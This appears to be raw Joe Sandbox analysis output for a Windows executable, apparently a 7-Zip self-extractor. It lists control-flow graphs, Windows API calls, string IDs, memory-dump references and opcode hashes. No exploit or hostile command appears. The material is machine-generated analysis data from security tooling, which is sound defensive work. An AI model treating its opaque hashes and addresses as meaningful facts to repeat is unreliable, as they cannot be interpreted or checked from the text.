                                        • Opcode ID: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
                                        • Instruction ID: 158ffaedae0d42993a529c42e252781da09b2560f8e529a8c548a3e081932a5e
                                        • Opcode Fuzzy Hash: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
                                        • Instruction Fuzzy Hash: 254192B0944344AFDB20DFA4DC45AEA7BB8FB09711F20452FFA51973A1D7784981CB58

                                        Control-flow Graph

                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
                                        • CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
                                        • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
                                        • DispatchMessageW.USER32(?), ref: 00401B89
                                        • KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
                                        • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
                                        • String ID: Static
                                        • API String ID: 2479445380-2272013587
                                        • Opcode ID: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                                        • Instruction ID: f02a6d563a0a994406544e3b77250aae51f77c8b940714b819f60fd1d37dc764
                                        • Opcode Fuzzy Hash: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                                        • Instruction Fuzzy Hash: 10F03C3250212476CA203FA69C4DEEF7E6CDB86BA2F008160B615A10D1DAB88241C6B9

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 781 40b163-40b183 call 40f0b6 784 40b2f6-40b2f9 781->784 785 40b189-40b190 call 40ac2d 781->785 788 40b192-40b194 785->788 789 40b199-40b1d6 call 40adc3 memcpy 785->789 788->784 792 40b1d9-40b1dd 789->792 793 40b202-40b221 792->793 794 40b1df-40b1f2 792->794 800 40b2a2 793->800 801 40b223-40b22b 793->801 795 40b297-40b2a0 ??3@YAXPAX@Z 794->795 796 40b1f8 794->796 799 40b2f4-40b2f5 795->799 796->793 797 40b1fa-40b1fc 796->797 797->793 797->795 799->784 802 40b2a4-40b2a5 800->802 803 40b2a7-40b2aa 801->803 804 40b22d-40b231 801->804 805 40b2ed-40b2f2 ??3@YAXPAX@Z 802->805 803->802 804->793 806 40b233-40b243 804->806 805->799 807 40b245 806->807 808 40b27a-40b292 memmove 806->808 809 40b254-40b258 807->809 808->792 810 40b25a 809->810 811 40b24c-40b24e 809->811 812 40b25c 810->812 811->812 813 40b250-40b251 811->813 812->808 814 40b25e-40b267 call 40ac2d 812->814 813->809 817 40b269-40b278 814->817 818 40b2ac-40b2e5 memcpy call 40dcfb 814->818 817->808 819 40b247-40b24a 817->819 820 40b2e8-40b2eb 818->820 819->809 820->805
                                        APIs
                                        • memcpy.MSVCRT(00000000,?,0000001F,00010000), ref: 0040B1C5
                                        • memmove.MSVCRT(00000000,-000000C1,00000020,?,00010000), ref: 0040B289
                                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040B298
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ??3@memcpymemmove
                                        • String ID:
                                        • API String ID: 3549172513-3916222277
                                        • Opcode ID: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
                                        • Instruction ID: 201babb0cc669d9fea5df8a163075e687156198648327345136f7fe875bf0058
                                        • Opcode Fuzzy Hash: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
                                        • Instruction Fuzzy Hash: 495181B1A00205ABDF14DB95C889AAE7BB4EF49354F1441BAE905B7381D338DD81CB9D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 822 403354-40337a lstrlenW call 4024fc 825 403385-403391 822->825 826 40337c-403380 call 40112b 822->826 828 403393-403397 825->828 829 403399-40339f 825->829 826->825 828->829 830 4033a2-4033a4 828->830 829->830 831 4033c8-4033d1 call 401986 830->831 834 4033d3-4033e6 GetSystemTimeAsFileTime GetFileAttributesW 831->834 835 4033b7-4033b9 831->835 838 4033e8-4033f6 call 40301a 834->838 839 4033ff-403408 call 401986 834->839 836 4033a6-4033ae 835->836 837 4033bb-4033bd 835->837 836->837 844 4033b0-4033b4 836->844 840 4033c3 837->840 841 403477-40347d 837->841 838->839 852 4033f8-4033fa 838->852 853 403419-40341b 839->853 854 40340a-403417 call 407776 839->854 840->831 848 4034a7-4034ba call 407776 ??3@YAXPAX@Z 841->848 849 40347f-40348a 841->849 844->837 845 4033b6 844->845 845->835 865 4034bc-4034c0 848->865 849->848 850 40348c-403490 849->850 850->848 856 403492-403497 850->856 860 40349c-4034a5 ??3@YAXPAX@Z 852->860 857 40346b-403475 ??3@YAXPAX@Z 853->857 858 40341d-40343c memcpy 853->858 854->852 856->848 862 403499-40349b 856->862 857->865 863 403451-403455 858->863 864 40343e 858->864 860->865 862->860 867 403440-403448 863->867 868 403457-403464 call 401986 863->868 866 403450 864->866 866->863 867->868 869 40344a-40344e 867->869 868->854 872 403466-403469 868->872 869->866 869->868 872->857 872->858
                                        APIs
                                        • lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
                                        • GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
                                        • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
                                        • ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
                                          • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                          • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                        • memcpy.MSVCRT(-00000001,00404AC6,?,?,?,?,?,00404AC6,?), ref: 0040342F
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 0040346C
                                        • ??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,00404AC6,00404AC6,?,?,?,?,00404AC6,?), ref: 004034B2
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
                                        • String ID:
                                        • API String ID: 846840743-0
                                        • Opcode ID: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
                                        • Instruction ID: c1b9adc2f16cc45d244a7c0b75b8b4a4f89234fa72cd4c12ee41ca3d86f3c48f
                                        • Opcode Fuzzy Hash: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
                                        • Instruction Fuzzy Hash: 8F41C836904611AADB216F998881ABF7F6CEF40716F80403BED01B61D5DB3C9B4282DD

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00401F47: GetUserDefaultUILanguage.KERNEL32(00404416,00000000,00000020,?), ref: 00401F51
                                          • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                          • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                                          • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                          • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                                          • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                          • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                          • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                                          • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                          • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                          • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                                          • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                          • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                          • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                          • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
                                          • Part of subcall function 00401F9D: _wtol.MSVCRT ref: 0040212A
                                          • Part of subcall function 00401F9D: MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,00000000,00000020,?), ref: 0040448C
                                        • wsprintfW.USER32 ref: 004044A7
                                          • Part of subcall function 00402F6C: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
                                        • #17.COMCTL32(?,?,?,?,00000000,00000020,?), ref: 00404533
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                        • String ID: 7zSfxFolder%02d$IA
                                        • API String ID: 3387708999-1317665167
                                        • Opcode ID: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                                        • Instruction ID: c443879f351b6d6d2b07c84fde6f3777072453d7374e8d7fc75fcfd2f507d9dd
                                        • Opcode Fuzzy Hash: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                                        • Instruction Fuzzy Hash: E03140B19042199BDB10FFA2DC86AEE7B78EB44308F40407FF619B21E1EB785644DB58

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 913 408ea4-408ebf call 40aef3 916 408ec1-408ecb 913->916 917 408ece-408f07 call 4065ea call 408726 913->917 922 408fd5-408ffb call 408d21 call 408b7c 917->922 923 408f0d-408f17 ??2@YAPAXI@Z 917->923 935 408ffd-409013 call 408858 922->935 936 40901e 922->936 924 408f26 923->924 925 408f19-408f24 923->925 927 408f28-408f61 call 4010e2 ??2@YAPAXI@Z 924->927 925->927 933 408f73 927->933 934 408f63-408f71 927->934 937 408f75-408fae call 4010e2 call 408726 call 40cdb8 933->937 934->937 945 409199-4091b0 935->945 946 409019-40901c 935->946 939 409020-409035 call 40e8da call 40874d 936->939 966 408fb0-408fb2 937->966 967 408fb6-408fbb 937->967 954 409037-409044 ??2@YAPAXI@Z 939->954 955 40906d-40907d 939->955 952 4091b6 945->952 953 40934c-409367 call 4087ea 945->953 946->939 957 4091b9-4091e9 952->957 975 409372-409375 953->975 976 409369-40936f 953->976 958 409046-40904d call 408c96 954->958 959 40904f 954->959 968 4090ad-4090b3 955->968 969 40907f 955->969 978 409219-40925f call 40e811 * 2 957->978 979 4091eb-4091f1 957->979 964 409051-409061 call 408726 958->964 959->964 988 409063-409066 964->988 989 409068 964->989 966->967 970 408fc3-408fcf 967->970 971 408fbd-408fbf 967->971 981 409187-409196 call 408e83 968->981 982 4090b9-4090d9 call 40d94b 968->982 977 409081-4090a7 call 40e959 call 408835 call 408931 call 408963 969->977 970->922 970->923 971->970 975->977 983 40937b-4093a2 call 40e811 975->983 976->975 977->968 1016 409261-409264 978->1016 1017 4092c9 978->1017 986 4091f7-409209 979->986 987 4092b9-4092bb 979->987 981->945 993 4090de-4090e6 982->993 1002 4093a4-4093b8 call 408761 983->1002 1003 4093ba-4093d6 983->1003 1014 409293-409295 986->1014 1015 40920f-409211 986->1015 1004 4092bf-4092c4 987->1004 996 40906a 988->996 989->996 1000 409283-409288 993->1000 1001 4090ec-4090f3 993->1001 996->955 1012 409290 1000->1012 1013 40928a-40928c 1000->1013 1008 409121-409124 1001->1008 1009 4090f5-4090f9 1001->1009 1002->1003 1080 4093d7 call 40ce70 1003->1080 1081 4093d7 call 40f160 1003->1081 1004->977 1022 4092b2-4092b7 1008->1022 1023 40912a-409138 call 408726 1008->1023 1009->1008 1018 4090fb-4090fe 1009->1018 1012->1014 1013->1012 1025 409297-409299 1014->1025 1026 40929d-4092a0 1014->1026 1015->978 1024 409213-409215 1015->1024 1027 409267-40927f call 408761 1016->1027 1030 4092cc-4092d2 1017->1030 1028 409104-409112 call 408726 1018->1028 1029 4092a5-4092aa 1018->1029 1020 4093da-4093e4 call 40e959 1020->977 1022->987 1022->1004 1046 409145-409156 call 40cdb8 1023->1046 1047 40913a-409140 call 40d6f0 1023->1047 1024->978 1025->1026 1026->977 1050 409281 1027->1050 1028->1046 1051 409114-40911f call 40d6cb 1028->1051 1029->1004 1034 4092ac-4092ae 1029->1034 1037 4092d4-4092e0 call 408a55 1030->1037 1038 40931d-409346 call 40e959 * 2 1030->1038 1034->1022 1057 4092e2-4092ec 1037->1057 1058 4092ee-4092fa call 408aa0 1037->1058 1038->953 1038->957 1059 409158-40915a 1046->1059 1060 40915e-409163 1046->1060 1047->1046 1050->1030 1051->1046 1063 409303-40931b call 408761 1057->1063 1074 409300 1058->1074 1075 4093e9-4093fe call 40e959 * 2 1058->1075 1059->1060 1066 409165-409167 1060->1066 1067 40916b-409170 1060->1067 1063->1037 1063->1038 1066->1067 1071 409172-409174 1067->1071 1072 409178-409181 1067->1072 1071->1072 1072->981 1072->982 1074->1063 1075->977 1080->1020 1081->1020
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00000018,?,?,00000000,?), ref: 00408F0F
                                        • ??2@YAPAXI@Z.MSVCRT(00000028,00000000,?,?,00000000,?), ref: 00408F59
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ??2@
                                        • String ID: IA$IA
                                        • API String ID: 1033339047-1400641299
                                        • Opcode ID: 6a22e71803ea0f4d69e2f58a84b042c4ce0c016d1f42beed39b79896576e25f5
                                        • Instruction ID: ddcf9de22f7a46eeefc4975c1fab543939f34ce9f972055b0c78c556d294e1f5
                                        • Opcode Fuzzy Hash: 6a22e71803ea0f4d69e2f58a84b042c4ce0c016d1f42beed39b79896576e25f5
                                        • Instruction Fuzzy Hash: EF123671A00209DFCB14EFA5C98489ABBB5FF48304B10456EF95AA7392DB39ED85CF44

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1095 410cd0-410d1a call 410b9a free 1098 410d22-410d23 1095->1098 1099 410d1c-410d1e 1095->1099 1099->1098
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: $KA$4KA$HKA$\KA
                                        • API String ID: 1294909896-3316857779
                                        • Opcode ID: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                                        • Instruction ID: 889df95fe732b3a4b2d84b4ab476e7a54c7f97cead7299b76f73e2708a1c6c0a
                                        • Opcode Fuzzy Hash: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                                        • Instruction Fuzzy Hash: C5F09271409B109FC7319F55E405AC6B7F4AE447183058A2EA89A5BA11D3B8F989CB9C

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1100 4096c7-40970f _EH_prolog call 4010e2 1103 409711-409714 1100->1103 1104 409717-40971a 1100->1104 1103->1104 1105 409730-409755 1104->1105 1106 40971c-409721 1104->1106 1109 409757-40975d 1105->1109 1107 409723-409725 1106->1107 1108 409729-40972b 1106->1108 1107->1108 1110 409b93-409ba4 1108->1110 1111 409763-409767 1109->1111 1112 409827-40983a call 40118a 1109->1112 1113 409769-40976c 1111->1113 1114 40976f-40977e 1111->1114 1121 409851-409876 call 408e4e ??2@YAPAXI@Z 1112->1121 1122 40983c-409846 call 409425 1112->1122 1113->1114 1115 409780-409796 call 4094e0 call 40969d call 40e959 1114->1115 1116 4097a3-4097a8 1114->1116 1137 40979b-4097a1 1115->1137 1119 4097b6-4097f0 call 4094e0 call 40969d call 40e959 call 4095b7 1116->1119 1120 4097aa-4097b4 1116->1120 1125 4097f3-409809 1119->1125 1120->1119 1120->1125 1133 409881-40989a call 4010e2 call 40eb24 1121->1133 1134 409878-40987f call 40ebf7 1121->1134 1144 40984a-40984c 1122->1144 1130 40980c-409814 1125->1130 1136 409816-409825 call 409403 1130->1136 1130->1137 1154 40989d-4098c0 call 40eb19 1133->1154 1134->1133 1136->1130 1137->1109 1144->1110 1157 4098c2-4098c7 1154->1157 1158 4098f6-4098f9 1154->1158 1161 4098c9-4098cb 1157->1161 1162 4098cf-4098e7 call 409530 call 409425 1157->1162 1159 409925-409949 ??2@YAPAXI@Z 1158->1159 1160 4098fb-409900 1158->1160 1164 409954 1159->1164 1165 40994b-409952 call 409c13 1159->1165 1166 409902-409904 1160->1166 1167 409908-40991e call 409530 call 409425 1160->1167 1161->1162 1180 4098e9-4098eb 1162->1180 1181 4098ef-4098f1 1162->1181 1170 409956-40996d call 4010e2 1164->1170 1165->1170 1166->1167 1167->1159 1182 40997b-4099a0 call 409fb4 1170->1182 1183 40996f-409978 1170->1183 1180->1181 1181->1110 1186 4099a2-4099a7 1182->1186 1187 4099e3-4099e6 1182->1187 1183->1182 1190 4099a9-4099ab 1186->1190 1191 4099af-4099b4 1186->1191 1188 4099ec-409a49 call 409603 call 4094b1 call 408ea4 1187->1188 1189 409b4e-409b53 1187->1189 1205 409a4e-409a53 1188->1205 1194 409b55-409b56 1189->1194 1195 409b5b-409b7f 1189->1195 1190->1191 1192 4099b6-4099b8 1191->1192 1193 4099bc-4099d4 call 409530 call 409425 1191->1193 1192->1193 1206 4099d6-4099d8 1193->1206 1207 4099dc-4099de 1193->1207 1194->1195 1195->1154 1208 409ab5-409abb 1205->1208 1209 409a55 1205->1209 1206->1207 1207->1110 1211 409ac1-409ac3 1208->1211 1212 409abd-409abf 1208->1212 1210 409a57 1209->1210 1213 409a5a-409a63 call 409f49 1210->1213 1214 409a65-409a67 1211->1214 1215 409ac5-409ad1 1211->1215 1212->1210 1213->1214 1226 409aa2-409aa4 1213->1226 1217 409a69-409a6a 1214->1217 1218 409a6f-409a71 1214->1218 1219 409ad3-409ad5 1215->1219 1220 409ad7-409add 1215->1220 1217->1218 1223 409a73-409a75 1218->1223 1224 409a79-409a91 call 409530 call 409425 1218->1224 1219->1213 1220->1195 1221 409adf-409ae5 1220->1221 1221->1195 1223->1224 1224->1144 1233 409a97-409a9d 1224->1233 1229 409aa6-409aa8 1226->1229 1230 409aac-409ab0 1226->1230 1229->1230 1230->1195 1233->1144
                                        APIs
                                        • _EH_prolog.MSVCRT ref: 004096D0
                                        • ??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040986E
                                        • ??2@YAPAXI@Z.MSVCRT(00000038,?,00000000,00000000,00000001), ref: 00409941
                                          • Part of subcall function 00409C13: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,00409952,?,00000000,00000000,00000001), ref: 00409C3B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ??2@$H_prolog
                                        • String ID: HIA
                                        • API String ID: 3431946709-2712174624
                                        • Opcode ID: 3a91edc2a80342029bdf13785710b8021a7be55c7c109f54d8d38dfd795fbdbc
                                        • Instruction ID: da3614a8b55b1d80bdf53177d95d0cff5abf3d9c279f99a440b99522f39c568d
                                        • Opcode Fuzzy Hash: 3a91edc2a80342029bdf13785710b8021a7be55c7c109f54d8d38dfd795fbdbc
                                        • Instruction Fuzzy Hash: 53F13971610249DFCB24DF69C884AAA77F4BF48314F24416AF829AB392DB39ED41CF54

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1236 402844-40288e call 411c20 call 40dcfb lstrlenA * 2 1240 402893-4028af call 40dcc7 1236->1240 1242 4028b5-4028ba 1240->1242 1243 40297f 1240->1243 1242->1243 1244 4028c0-4028ca 1242->1244 1245 402981-402985 1243->1245 1246 4028cd-4028d2 1244->1246 1247 402911-402916 1246->1247 1248 4028d4-4028d9 1246->1248 1249 40293b-40295f memmove 1247->1249 1251 402918-40292b memcmp 1247->1251 1248->1249 1250 4028db-4028ee memcmp 1248->1250 1256 402961-402968 1249->1256 1257 40296e-402979 1249->1257 1252 4028f4-4028fe 1250->1252 1253 40297b-40297d 1250->1253 1254 40290b-40290f 1251->1254 1255 40292d-402939 1251->1255 1252->1243 1258 402900-402906 call 402640 1252->1258 1253->1245 1254->1246 1255->1246 1256->1257 1259 402890 1256->1259 1257->1245 1258->1254 1259->1240
                                        APIs
                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
                                        • memcmp.MSVCRT(?,?,?), ref: 004028E4
                                        • memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
                                        • memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: lstrlenmemcmp$memmove
                                        • String ID:
                                        • API String ID: 3251180759-0
                                        • Opcode ID: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
                                        • Instruction ID: d4955105e7b234ce255a009ef61331e6eb412850de833d0a73495bfba1f32545
                                        • Opcode Fuzzy Hash: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
                                        • Instruction Fuzzy Hash: 4A417F72E00209AFCF01DFA4C9889EEBBB5EF08344F04447AE945B3291D3B49E55CB55

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1263 40150b-401561 call 408726 call 401329 call 401429 CreateThread 1270 401563 call 40786b 1263->1270 1271 401568-401583 WaitForSingleObject 1263->1271 1270->1271 1273 401585-401588 1271->1273 1274 4015b7-4015bd 1271->1274 1277 40158a-40158d 1273->1277 1278 4015ab 1273->1278 1275 40161b 1274->1275 1276 4015bf-4015d4 GetExitCodeThread 1274->1276 1280 401620-401623 1275->1280 1281 4015d6-4015d8 1276->1281 1282 4015de-4015e9 1276->1282 1283 4015a7-4015a9 1277->1283 1284 40158f-401592 1277->1284 1279 4015ad-4015b5 call 407776 1278->1279 1279->1275 1281->1282 1286 4015da-4015dc 1281->1286 1287 4015f1-4015fa 1282->1287 1288 4015eb-4015ec 1282->1288 1283->1279 1289 4015a3-4015a5 1284->1289 1290 401594-401597 1284->1290 1286->1280 1293 401605-401611 SetLastError 1287->1293 1294 4015fc-401603 1287->1294 1292 4015ee-4015ef 1288->1292 1289->1279 1295 401599-40159c 1290->1295 1296 40159e-4015a1 1290->1296 1297 401613-401618 call 407776 1292->1297 1293->1297 1294->1275 1294->1293 1295->1275 1295->1296 1296->1292 1297->1275
                                        APIs
                                        • CreateThread.KERNELBASE(00000000,00000000,0040129C,00000000,00000000,?), ref: 0040154F
